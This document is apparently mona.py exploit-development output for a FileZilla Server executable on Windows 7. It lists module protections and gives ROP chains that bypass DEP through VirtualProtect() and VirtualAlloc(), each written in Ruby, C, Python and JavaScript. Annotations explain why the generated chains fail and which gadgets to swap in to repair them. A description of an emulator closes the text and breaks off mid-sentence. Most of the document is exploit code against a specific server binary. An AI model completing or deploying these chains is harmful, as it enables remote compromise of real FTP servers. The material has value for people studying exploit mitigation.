----------------------------------------------------------------------------------------------------------------------------------
Module info :
----------------------------------------------------------------------------------------------------------------------------------
Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
----------------------------------------------------------------------------------------------------------------------------------
0x756c0000 | 0x757dd000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
0x75630000 | 0x7563c000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
0x74ff0000 | 0x74ff6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
0x772c0000 | 0x77394000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
0x758c0000 | 0x7596c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
0x77470000 | 0x775ac000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
0x76200000 | 0x76219000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
0x74ad0000 | 0x74ad5000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
0x775b0000 | 0x775ba000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
0x75c80000 | 0x75d1d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
0x773a0000 | 0x77469000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
0x75e00000 | 0x75ea1000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
0x761e0000 | 0x761ff000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
0x71c60000 | 0x71c66000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wls0wndh.dll] (C:\Windows\system32\wls0wndh.dll)
0x775c0000 | 0x775c6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
0x771f0000 | 0x772bc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
0x75670000 | 0x756ba000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
0x74bb0000 | 0x74bb9000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
0x75000000 | 0x7503c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\system32\mswsock.dll)
0x770a0000 | 0x770ee000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
0x10000000 | 0x100a1000 | 0x000a1000 | False | False | False | False | False | 0.9.40.0 [FileZilla server_fixed.exe] (C:\Users\win7\Desktop\ftp\FileZilla server_fixed.exe)
0x77600000 | 0x776a0000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
0x75c40000 | 0x75c75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
----------------------------------------------------------------------------------------------------------------------------------
Note: every module in this process except FileZilla server_fixed.exe is rebased, SafeSEH-registered, ASLR-enabled and NXCompat-flagged. The server binary itself (base 0x10000000, 0x000a1000 bytes, none of those flags set) is therefore the only module whose addresses are the same on every run, and every gadget in the chains below is taken from it.
################################################################################
Register setup for VirtualProtect() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualProtect()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualProtect()
ECX = lpOldProtect (ptr to W address)
EDX = NewProtect (0x40)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
----------------------------------------------------------
Notes on the generated chain (they apply to each language variant below):
 - the first dword is 0x00000000: mona found no pointer to VirtualProtect() in the module's IAT, so the chain cannot run until that pointer is supplied some other way (the MOV EAX,[EAX] that follows would dereference 0);
 - the 0x1002f7f0 gadget that is meant to carry EAX into ESI also executes MOV DWORD PTR DS:[EAX+8],ECX, a write into kernel32 code (EAX holds the API address), and its PUSHAD / ADD ESP,4 / POP ESI / RETN tail returns into the PUSHAD-saved EBP rather than to the next chain entry; replace it with a clean PUSH EAX # POP ESI # RETN or MOV ESI,EAX from the module;
 - the POP EBX inside 0x10078e3e (ADD EDX,EBX # POP EBX # RETN 0x10) reloads EBX after dwSize was set, so the dword that follows that gadget must be dwSize (0x00000201), not 0x41414141;
 - the final gadget is PUSHAD # RETN 0x04: after popping the saved EDI it also discards the saved ESI (the API pointer), so the ROP NOP in EDI returns into the saved EBP and VirtualProtect() is never called; a plain PUSHAD # RETN is needed.
*** [ Ruby ] ***
def create_rop_chain()
  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets =
  [
    0x00000000,  # [-] Unable to find API pointer -> eax (no VirtualProtect() IAT entry found; must be supplied, the chain cannot run with 0 here)
    0x10078940,  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x1002f7f0,  # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX # POP ESI # RETN)
    0x10063196,  # POP EBP # RETN [FileZilla server_fixed.exe]
    0x1002351a,  # & push esp # ret [FileZilla server_fixed.exe]
    0x10022a13,  # POP EBX # RETN [FileZilla server_fixed.exe]
    0x00000201,  # 0x00000201-> ebx (dwSize)
    0x100557be,  # POP EBX # RETN [FileZilla server_fixed.exe]
    0x00000040,  # 0x00000040-> edx (loaded via ebx, added into edx below)
    0x1007c05c,  # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
    0x10078e3e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
    0x00000201,  # dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
    0x1007e8d3,  # POP ECX # RETN [FileZilla server_fixed.exe]
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x1009a062,  # &Writable location [FileZilla server_fixed.exe]
    0x10052a65,  # POP EDI # RETN [FileZilla server_fixed.exe]
    0x10068884,  # RETN (ROP NOP) [FileZilla server_fixed.exe]
    0x1002aeaf,  # POP EAX # RETN [FileZilla server_fixed.exe]
    0x90909090,  # nop
    0x1004e742,  # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe] (the RETN 0x04 skips the saved ESI, so VirtualProtect() is never reached; a plain PUSHAD # RETN is needed)
  ].flatten.pack("V*")
  return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#include <string.h>

/* Declares name[] as a VLA sized by the chain and fills it; use inside a function. */
#define CREATE_ROP_CHAIN(name) \
  int name##_length = create_rop_chain(NULL); \
  unsigned int name[name##_length / sizeof(unsigned int)]; \
  create_rop_chain(name);

/* mona emitted a dangling "unsigned int " parameter here; this chain takes none, so it is dropped. */
int create_rop_chain(unsigned int *buf)
{
  // rop chain generated with mona.py - www.corelan.be
  unsigned int rop_gadgets[] = {
    0x00000000, // [-] Unable to find API pointer -> eax (no VirtualProtect() IAT entry found; must be supplied, the chain cannot run with 0 here)
    0x10078940, // MOV EAX,DWORD PTR DS:[EAX] // POP ESI // POP EBP // RETN [FileZilla server_fixed.exe]
    0x41414141, // Filler (compensate)
    0x41414141, // Filler (compensate)
    0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX // POP ESI // RETN)
    0x10063196, // POP EBP // RETN [FileZilla server_fixed.exe]
    0x1002351a, // & push esp // ret [FileZilla server_fixed.exe]
    0x10022a13, // POP EBX // RETN [FileZilla server_fixed.exe]
    0x00000201, // 0x00000201-> ebx (dwSize)
    0x100557be, // POP EBX // RETN [FileZilla server_fixed.exe]
    0x00000040, // 0x00000040-> edx (loaded via ebx, added into edx below)
    0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
    0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
    0x00000201, // dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
    0x1007e8d3, // POP ECX // RETN [FileZilla server_fixed.exe]
    0x41414141, // Filler (RETN offset compensation)
    0x41414141, // Filler (RETN offset compensation)
    0x41414141, // Filler (RETN offset compensation)
    0x41414141, // Filler (RETN offset compensation)
    0x1009a062, // &Writable location [FileZilla server_fixed.exe]
    0x10052a65, // POP EDI // RETN [FileZilla server_fixed.exe]
    0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
    0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
    0x90909090, // nop
    0x1004e742, // PUSHAD // RETN 0x04 [FileZilla server_fixed.exe] (the RETN 0x04 skips the saved ESI, so VirtualProtect() is never reached; a plain PUSHAD // RETN is needed)
  };
  if (buf != NULL) {
    memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  }
  return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain);
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain);
*** [ Python ] ***
import struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x00000000,  # [-] Unable to find API pointer -> eax (no VirtualProtect() IAT entry found; must be supplied, the chain cannot run with 0 here)
        0x10078940,  # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x1002f7f0,  # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX # POP ESI # RETN)
        0x10063196,  # POP EBP # RETN [FileZilla server_fixed.exe]
        0x1002351a,  # & push esp # ret [FileZilla server_fixed.exe]
        0x10022a13,  # POP EBX # RETN [FileZilla server_fixed.exe]
        0x00000201,  # 0x00000201-> ebx (dwSize)
        0x100557be,  # POP EBX # RETN [FileZilla server_fixed.exe]
        0x00000040,  # 0x00000040-> edx (loaded via ebx, added into edx below)
        0x1007c05c,  # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
        0x10078e3e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
        0x00000201,  # dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
        0x1007e8d3,  # POP ECX # RETN [FileZilla server_fixed.exe]
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x1009a062,  # &Writable location [FileZilla server_fixed.exe]
        0x10052a65,  # POP EDI # RETN [FileZilla server_fixed.exe]
        0x10068884,  # RETN (ROP NOP) [FileZilla server_fixed.exe]
        0x1002aeaf,  # POP EAX # RETN [FileZilla server_fixed.exe]
        0x90909090,  # nop
        0x1004e742,  # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe] (the RETN 0x04 skips the saved ESI, so VirtualProtect() is never reached; a plain PUSHAD # RETN is needed)
    ]
    # little-endian dwords; b'' so this works on both Python 2 and 3
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
*** [ JavaScript ] ***
// rop chain generated with mona.py - www.corelan.be
var rop_gadgets = unescape(
  "%u0000%u0000" + // 0x00000000 : [-] Unable to find API pointer -> eax (no VirtualProtect() IAT entry found; must be supplied, the chain cannot run with 0 here)
  "%u8940%u1007" + // 0x10078940 : MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  "%u4141%u4141" + // 0x41414141 : Filler (compensate)
  "%u4141%u4141" + // 0x41414141 : Filler (compensate)
  "%uf7f0%u1002" + // 0x1002f7f0 : PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX # POP ESI # RETN)
  "%u3196%u1006" + // 0x10063196 : POP EBP # RETN [FileZilla server_fixed.exe]
  "%u351a%u1002" + // 0x1002351a : & push esp # ret [FileZilla server_fixed.exe]
  "%u2a13%u1002" + // 0x10022a13 : POP EBX # RETN [FileZilla server_fixed.exe]
  "%u0201%u0000" + // 0x00000201 : 0x00000201-> ebx (dwSize)
  "%u57be%u1005" + // 0x100557be : POP EBX # RETN [FileZilla server_fixed.exe]
  "%u0040%u0000" + // 0x00000040 : 0x00000040-> edx (loaded via ebx, added into edx below)
  "%uc05c%u1007" + // 0x1007c05c : XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  "%u8e3e%u1007" + // 0x10078e3e : ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  "%u0201%u0000" + // 0x00000201 : dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
  "%ue8d3%u1007" + // 0x1007e8d3 : POP ECX # RETN [FileZilla server_fixed.exe]
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%ua062%u1009" + // 0x1009a062 : &Writable location [FileZilla server_fixed.exe]
  "%u2a65%u1005" + // 0x10052a65 : POP EDI # RETN [FileZilla server_fixed.exe]
  "%u8884%u1006" + // 0x10068884 : RETN (ROP NOP) [FileZilla server_fixed.exe]
  "%uaeaf%u1002" + // 0x1002aeaf : POP EAX # RETN [FileZilla server_fixed.exe]
  "%u9090%u9090" + // 0x90909090 : nop
  "%ue742%u1004" + // 0x1004e742 : PUSHAD # RETN 0x04 [FileZilla server_fixed.exe] (the RETN 0x04 skips the saved ESI, so VirtualProtect() is never reached; a plain PUSHAD # RETN is needed)
  "");
--------------------------------------------------------------------------------------------------
################################################################################
Register setup for VirtualAlloc() :
--------------------------------------------
EAX = NOP (0x90909090)
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = ReturnTo (ptr to jmp esp)
ESI = ptr to VirtualAlloc()
EDI = ROP NOP (RETN)
--- alternative chain ---
EAX = ptr to &VirtualAlloc()
ECX = flProtect (0x40)
EDX = flAllocationType (0x1000)
EBX = dwSize
ESP = lpAddress (automatic)
EBP = POP (skip 4 bytes)
ESI = ptr to JMP [EAX]
EDI = ROP NOP (RETN)
+ place ptr to "jmp esp" on stack, below PUSHAD
--------------------------------------------
ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
--------------------------------------------------------
Notes on the generated chain (they apply to each language variant below):
 - the 0x1002f7f0 gadget that is meant to carry EAX into ESI also executes MOV DWORD PTR DS:[EAX+8],ECX, a write into kernel32 code (EAX holds the VirtualAlloc() address read from the IAT), and its PUSHAD / ADD ESP,4 / POP ESI / RETN tail returns into the PUSHAD-saved EBP rather than to the next chain entry; replace it with a clean PUSH EAX # POP ESI # RETN or MOV ESI,EAX from the module;
 - the POP EBX inside 0x10078e3e (ADD EDX,EBX # POP EBX # RETN 0x10) reloads EBX after dwSize was set, so the dword that follows that gadget must be dwSize (0x00000001), not 0x41414141;
 - the final gadget is PUSHAD # RETN 0x0C: after popping the saved EDI it also discards the saved ESI, EBP and ESP, so the ROP NOP in EDI returns into the saved EBX (dwSize) and VirtualAlloc() is never called; a plain PUSHAD # RETN is needed.
*** [ Ruby ] ***
def create_rop_chain()
  # rop chain generated with mona.py - www.corelan.be
  rop_gadgets =
  [
    0x1004388a,  # POP ESI # RETN [FileZilla server_fixed.exe]
    0x10082148,  # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
    0x1000c99f,  # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
    0x41414141,  # Filler (compensate)
    0x41414141,  # Filler (compensate)
    0x1002f7f0,  # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX # POP ESI # RETN)
    0x1005e2e1,  # POP EBP # RETN [FileZilla server_fixed.exe]
    0x10007dba,  # & push esp # ret [FileZilla server_fixed.exe]
    0x100681a5,  # POP EBX # RETN [FileZilla server_fixed.exe]
    0x00000001,  # 0x00000001-> ebx (dwSize)
    0x10055082,  # POP EBX # RETN [FileZilla server_fixed.exe]
    0x00001000,  # 0x00001000-> edx (loaded via ebx, added into edx below)
    0x1007c05c,  # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
    0x10078e3e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
    0x00000001,  # dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
    0x10080d44,  # POP ECX # RETN [FileZilla server_fixed.exe]
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x41414141,  # Filler (RETN offset compensation)
    0x00000040,  # 0x00000040-> ecx
    0x10066f18,  # POP EDI # RETN [FileZilla server_fixed.exe]
    0x10068884,  # RETN (ROP NOP) [FileZilla server_fixed.exe]
    0x1002aeaf,  # POP EAX # RETN [FileZilla server_fixed.exe]
    0x90909090,  # nop
    0x10014f48,  # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe] (the RETN 0x0C skips the saved ESI, EBP and ESP, so VirtualAlloc() is never reached; a plain PUSHAD # RETN is needed)
  ].flatten.pack("V*")
  return rop_gadgets
end
# Call the ROP chain generator inside the 'exploit' function :
rop_chain = create_rop_chain()
*** [ C ] ***
#include <string.h>

/* Declares name[] as a VLA sized by the chain and fills it; use inside a function. */
#define CREATE_ROP_CHAIN(name) \
  int name##_length = create_rop_chain(NULL); \
  unsigned int name[name##_length / sizeof(unsigned int)]; \
  create_rop_chain(name);

/* mona emitted a dangling "unsigned int " parameter here; this chain takes none, so it is dropped. */
int create_rop_chain(unsigned int *buf)
{
  // rop chain generated with mona.py - www.corelan.be
  unsigned int rop_gadgets[] = {
    0x1004388a, // POP ESI // RETN [FileZilla server_fixed.exe]
    0x10082148, // ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
    0x1000c99f, // MOV EAX,DWORD PTR DS:[ESI] // POP ESI // POP ECX // RETN [FileZilla server_fixed.exe]
    0x41414141, // Filler (compensate)
    0x41414141, // Filler (compensate)
    0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX // POP ESI // RETN)
    0x1005e2e1, // POP EBP // RETN [FileZilla server_fixed.exe]
    0x10007dba, // & push esp // ret [FileZilla server_fixed.exe]
    0x100681a5, // POP EBX // RETN [FileZilla server_fixed.exe]
    0x00000001, // 0x00000001-> ebx (dwSize)
    0x10055082, // POP EBX // RETN [FileZilla server_fixed.exe]
    0x00001000, // 0x00001000-> edx (loaded via ebx, added into edx below)
    0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
    0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
    0x00000001, // dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
    0x10080d44, // POP ECX // RETN [FileZilla server_fixed.exe]
    0x41414141, // Filler (RETN offset compensation)
    0x41414141, // Filler (RETN offset compensation)
    0x41414141, // Filler (RETN offset compensation)
    0x41414141, // Filler (RETN offset compensation)
    0x00000040, // 0x00000040-> ecx
    0x10066f18, // POP EDI // RETN [FileZilla server_fixed.exe]
    0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
    0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
    0x90909090, // nop
    0x10014f48, // PUSHAD // RETN 0x0C [FileZilla server_fixed.exe] (the RETN 0x0C skips the saved ESI, EBP and ESP, so VirtualAlloc() is never reached; a plain PUSHAD // RETN is needed)
  };
  if (buf != NULL) {
    memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  }
  return sizeof(rop_gadgets);
}
// use the 'rop_chain' variable after this call, it's just an unsigned int[]
CREATE_ROP_CHAIN(rop_chain);
// alternatively just allocate a large enough buffer and get the rop chain, i.e.:
// unsigned int rop_chain[256];
// int rop_chain_length = create_rop_chain(rop_chain);
*** [ Python ] ***
import struct

def create_rop_chain():
    # rop chain generated with mona.py - www.corelan.be
    rop_gadgets = [
        0x1004388a,  # POP ESI # RETN [FileZilla server_fixed.exe]
        0x10082148,  # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
        0x1000c99f,  # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
        0x41414141,  # Filler (compensate)
        0x41414141,  # Filler (compensate)
        0x1002f7f0,  # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX # POP ESI # RETN)
        0x1005e2e1,  # POP EBP # RETN [FileZilla server_fixed.exe]
        0x10007dba,  # & push esp # ret [FileZilla server_fixed.exe]
        0x100681a5,  # POP EBX # RETN [FileZilla server_fixed.exe]
        0x00000001,  # 0x00000001-> ebx (dwSize)
        0x10055082,  # POP EBX # RETN [FileZilla server_fixed.exe]
        0x00001000,  # 0x00001000-> edx (loaded via ebx, added into edx below)
        0x1007c05c,  # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
        0x10078e3e,  # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
        0x00000001,  # dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
        0x10080d44,  # POP ECX # RETN [FileZilla server_fixed.exe]
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x41414141,  # Filler (RETN offset compensation)
        0x00000040,  # 0x00000040-> ecx
        0x10066f18,  # POP EDI # RETN [FileZilla server_fixed.exe]
        0x10068884,  # RETN (ROP NOP) [FileZilla server_fixed.exe]
        0x1002aeaf,  # POP EAX # RETN [FileZilla server_fixed.exe]
        0x90909090,  # nop
        0x10014f48,  # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe] (the RETN 0x0C skips the saved ESI, EBP and ESP, so VirtualAlloc() is never reached; a plain PUSHAD # RETN is needed)
    ]
    # little-endian dwords; b'' so this works on both Python 2 and 3
    return b''.join(struct.pack('<I', _) for _ in rop_gadgets)

rop_chain = create_rop_chain()
*** [ JavaScript ] ***
// rop chain generated with mona.py - www.corelan.be
var rop_gadgets = unescape(
  "%u388a%u1004" + // 0x1004388a : POP ESI # RETN [FileZilla server_fixed.exe]
  "%u2148%u1008" + // 0x10082148 : ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  "%uc99f%u1000" + // 0x1000c99f : MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  "%u4141%u4141" + // 0x41414141 : Filler (compensate)
  "%u4141%u4141" + // 0x41414141 : Filler (compensate)
  "%uf7f0%u1002" + // 0x1002f7f0 : PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe] (unsafe: writes through EAX and returns into a PUSHAD-saved value; replace with a clean PUSH EAX # POP ESI # RETN)
  "%ue2e1%u1005" + // 0x1005e2e1 : POP EBP # RETN [FileZilla server_fixed.exe]
  "%u7dba%u1000" + // 0x10007dba : & push esp # ret [FileZilla server_fixed.exe]
  "%u81a5%u1006" + // 0x100681a5 : POP EBX # RETN [FileZilla server_fixed.exe]
  "%u0001%u0000" + // 0x00000001 : 0x00000001-> ebx (dwSize)
  "%u5082%u1005" + // 0x10055082 : POP EBX # RETN [FileZilla server_fixed.exe]
  "%u1000%u0000" + // 0x00001000 : 0x00001000-> edx (loaded via ebx, added into edx below)
  "%uc05c%u1007" + // 0x1007c05c : XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  "%u8e3e%u1007" + // 0x10078e3e : ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  "%u0001%u0000" + // 0x00000001 : dwSize -> ebx again: the POP EBX above consumes this slot (mona's 0x41414141 filler here left ebx = 0x41414141)
  "%u0d44%u1008" + // 0x10080d44 : POP ECX # RETN [FileZilla server_fixed.exe]
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u4141%u4141" + // 0x41414141 : Filler (RETN offset compensation)
  "%u0040%u0000" + // 0x00000040 : 0x00000040-> ecx
  "%u6f18%u1006" + // 0x10066f18 : POP EDI # RETN [FileZilla server_fixed.exe]
  "%u8884%u1006" + // 0x10068884 : RETN (ROP NOP) [FileZilla server_fixed.exe]
  "%uaeaf%u1002" + // 0x1002aeaf : POP EAX # RETN [FileZilla server_fixed.exe]
  "%u9090%u9090" + // 0x90909090 : nop
  "%u4f48%u1001" + // 0x10014f48 : PUSHAD # RETN 0x0C [FileZilla server_fixed.exe] (the RETN 0x0C skips the saved ESI, EBP and ESP, so VirtualAlloc() is never reached; a plain PUSHAD # RETN is needed)
  "");
--------------------------------------------------------------------------------------------------
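Both register-setup blocks above rely on the same trick: line the registers up so that PUSHAD writes a ready-made stdcall frame onto the stack (saved EDI = ROP NOP, ESI = API pointer, EBP = return address, ESP = lpAddress, then EBX/EDX/ECX as the size and flag arguments and EAX as the landing pad). The emulator below is an added example written for this page, not mona's or FileZilla's code: it replays the VirtualAlloc() chain printed above through the gadget shapes mona listed (semantics copied from mona's comments, not disassembled) and then decodes the PUSHAD frame the way VirtualAlloc() would read it. Two values are assumptions that do not exist in the binary: FAKE_VIRTUALALLOC stands in for whatever the IAT slot 0x10082148 really holds, and HYPOTHETICAL_MOV_ESI_EAX stands in for a clean ESI-loading gadget; stack "addresses" are byte offsets into a constructed array. Replayed as generated, the chain stops at 0x1002f7f0; with the placeholder gadget it reaches PUSHAD with dwSize = 0x41414141, and the PUSHAD # RETN 0x0C makes the ROP NOP return into that dwSize slot rather than into VirtualAlloc(). The same emulator applies to the VirtualProtect() chain, whose first dword (0x00000000) would stop it 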